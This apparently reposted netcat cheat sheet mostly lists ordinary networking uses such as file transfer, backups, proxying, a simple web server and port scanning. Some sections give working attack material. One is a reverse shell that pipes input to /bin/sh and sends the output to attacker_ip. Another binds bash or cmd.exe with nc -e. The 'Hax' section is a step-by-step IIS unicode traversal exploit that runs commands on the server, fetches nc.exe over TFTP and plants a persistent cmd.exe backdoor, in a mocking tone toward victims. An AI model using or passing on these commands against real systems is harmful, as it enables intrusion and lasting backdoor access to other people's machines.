http://www.securitydocs.com/library/3376
============= nc -h
[v1.10]
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -e prog		program to exec after connect [dangerous!!]
        -b		allow broadcasts
        -g gateway	source-routing hop point[s], up to 8
        -G num		source-routing pointer: 4, 8, 12, ...
        -h		this cruft
        -i secs		delay interval for lines sent, ports scanned
        -l		listen mode, for inbound connects
        -n		numeric-only IP addresses, no DNS
        -o file		hex dump of traffic
        -p port		local port number
        -r		randomize local and remote ports
        -q secs		quit after EOF on stdin and delay of secs
        -s addr		local source address
        -t		answer TELNET negotiation
        -u		UDP mode
        -v		verbose [use twice to be more verbose]
        -w secs		timeout for connects and final net reads
        -z		zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

============= 2 way communication
------------- listening system
nc -l -p 1111
------------- connecting system
nc 127.0.0.1 1111
============= remote command
------------- RX side
nc -l -p 2000 -q 0 | destcmd
------------- TX side
srccmd | nc -q 0 otherhost 2000

------------- transfer compressed data
nc -l -p 2000 -q 0 | gzip -d | destcmd
srccmd | gzip | nc -q 0 otherhost 2000

----- similar
srccmd | ssh user@otherhost destcmd

----- file transfer with tar

... target: 
nc -l 3000 | tar xvf -

... source: 
tar -cf - . | nc target_ip 3000

============= www server
remote=server
echo -e "GET http://$remote HTTP/1.0\n\n" | nc $remote 80 >/tmp/www.log

============= www server
cat << EOM > /tmp/www-file
<pre>
Simple WWW server V-1.0
-----------------------
</pre>
EOM

while true
do
    cat /tmp/www-file  | nc -l -p 1500 | head --bytes 2000 >>/tmp/requests
    echo -e "$(date '+%F %T') =====" >>/tmp/requests
done
----------------------- basic web server
while `netcat -lp 8080 -c 'echo HTTP/1.0 200 OK;echo;cat file`
do
done
============= generic tcp proxy
infile=/tmp/inflow.$$
outfile=/tmp/outflow.$$
bpipe=/tmp/backpipe.$$
mknod $bpipe p.$$
port=5900
export infile outfile bpipe port

nc -l -p $port 0<$bpipe | tee -a $infile | nc localhost $port | tee -a $outfile 1>$bpipe
nc -l -p 80 0<$bpipe | tee -a $infile | nc localhost 80 | tee -a $outfile 1>$bpipe

Requests coming into the proxy from the client arrive at the first nc, listening
on port 80. They get handed off to the "tee" command, which logs them to the
inflow file, then continue on to the second nc command which hands them off to
the real web server. When a response comes back from the server, it arrives back
at the second nc command, gets logged in the second tee command to the outflow
file, and then gets pushed into the backpipe pipe on the local filesystem. Since
the first netcat is listening to that pipe, these responses get handed to that
first netcat, which then dutifully gives them back to the original client.

============= backup remote system
----- server
cat backup.iso | nc -l 2222
----- client
nc serv_host 2222 > backup.iso

----- monitor progress on both sides
cat backup.iso | pv -b | nc -l 2222
nc serv_host 2222 | pv -b > backup.iso

----- server
dd if=/dev/hdb7 | gzip -9 | nc -l 2222
----- client
nc serv_host 2222 | pv -b > hdb7partition.img.gz
    	    	    pv - monitor the progress of data through a pipe
----- server
tar -cfz - /home | nc -l 2222
----- client
nc serv_host 2222 | pv -b > home.tgz

============= port scan
nc -vvn -z 10.0.0.1 79-81

============= shell
On attacker: nc -l -u -p 53

On target: nc -u -l -p 53 | /bin/sh | nc -u attacker_ip 53

From attacker: cat | nc -u target_ip 53

============= encrypted
Machine A: cryptcat -l -p 1234 < testfile
Machine B: cryptcat <machine A IP> 1234

This is identical to the normal netcat options.
============= shell redirection (to - from) 	[nc -e]
----- server
nc -v -e '/bin/bash' -l -p 1234 -t
----- client
telnet 127.0.0.1 1234
============= port scan
----- TCP
echo EXIT | nc -w 1 127.0.0.1 20-250 500-600 5990-7000
----- UDP
nc -u -v -w 1 127.0.0.1 20-250 500-600 5990-7000
-----
echo QUIT | nc -v -w 5 target 20-250 500-600 5990-7000
============= Hax
Simple type of IIS exploit that is used in many netcat seminars.
This was patched like two years ago, but it's lots of fun nontheless.

First up, start netcat:

$nc -v -n 70.69.68.67 80

Where of course the IP address is the IIS Server's IP and 80 is the standard
port for TCP/HTTP. The -v option makes it more verbose (more output w00t) and -n
means that we are giving it a numeric IP address only, as opposed to a domain or
something.

Now once it connects, type this and hit enter:

GET http://70.69.68.67/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

This will get a standard HTTP banner. But wait! It also does a 'dir c:\', which
lists the contents of C:\, Windows' version of /.

Now let's upload netcat to their pathetic unpatched asses. Or if you're not a
big binary-fetish man, we can just use their server instead.

$nc -v -n 70.69.68.67 80
GET http://70.69.68.67/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+70.69.68.67+GET+nc.exe

Now let's use netcat to create a backdoor. Remember our pseudo-telnet server?
We want to run this on the netcat on their server.

nc -L -p 1337 -d -e cmd.exe

-L (not -l, -L) tells netcat to wait for connections without closing. -d Tells
it to detach (d for detach) from the process we want it to run).

If we convert that command to a unicode URL it looks like this:

http:///c+nc+-L+-p+1337+-e+cmd.exe

Run that on their machine the same way you ran everything else - by appending it
to the end of the cmd.exe?/ thing. If you can't figure that out...you'd better
reread this.

There's really a load of stuff you can do to mess with them. Transfer a file to
their computer? Figure that one out, you can put it together from previous usage
examples in this article.

===== listen on port 6000 to detect attacks on X server
while true ; do
  nc -v -l -s <your-addr> -p 6000 localhost 2
done

===== 
nc -l -p 1234 | uncompress -c | tar xvfp -
tar cfp - /some/dir | compress -c | nc -w 3 othermachine 1234
============= opendchub
Hub is up and running. Listening for user connections on port 7065
and listening for admin connections on port 53696

===== local port forwarding
while `netcat -lp 8080 -c 'netcat localhost 80'`; do; done
===== 
collect messages from exim server
socat -u TCP4-LISTEN:567,reuseaddr,fork OPEN:/tmp/karma.log,creat,append
===== 
===== 
=====